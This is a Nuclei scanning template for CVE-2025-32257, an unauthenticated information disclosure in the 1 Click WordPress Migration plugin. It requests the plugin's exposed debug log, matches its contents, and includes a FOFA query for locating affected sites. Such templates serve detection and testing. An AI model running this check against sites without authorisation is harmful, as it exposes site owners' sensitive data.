id: CVE-2025-32257
info:
  name: 1 Click WordPress Migration <= 2.2 - Unauthenticated Information Disclsoure
  author: pussycat0x
  severity: medium
  description: |
    1 Click WordPress Migration <= 2.2 contains an information disclosure caused by uncleared debug information, letting attackers retrieve embedded sensitive data, exploit requires no specific privileges.
  impact:
    Attackers can access sensitive embedded data, potentially leading to information disclosure and further exploitation.
  remediation:
    Remove debug information and update to the latest version of 1 Click WordPress Migration.
  reference:
    https://wpscan.com/vulnerability/03211216-8cc9-49f9-83da-9fbc57554816/
  metadata:
    verified: true
    max-request: 1
    fofa-query: body="/wp-content/plugins/1-click-migration/"
    vendor: 1-click-migration
    product: 1-click-migration
    framework: wordpress
  tags: cve,cve2025,wpscan,wordpress,wp-plugin,1clickmigration,vkev

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/1-click-migration/ocm_debug.log"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "debug log content","SYSLOG","Archiving plugins")'
        condition: and
# digest: 4a0a00473045022100edfde4922d9c3b11dc19af7f5550dc3a79128a856f24c9d9129594728e32e223022038f949c5175bc53a89274110b1b735e7505c61343fb09f3195dbbda61d12fbd7:922c64590222798bb761d5b6d8e72950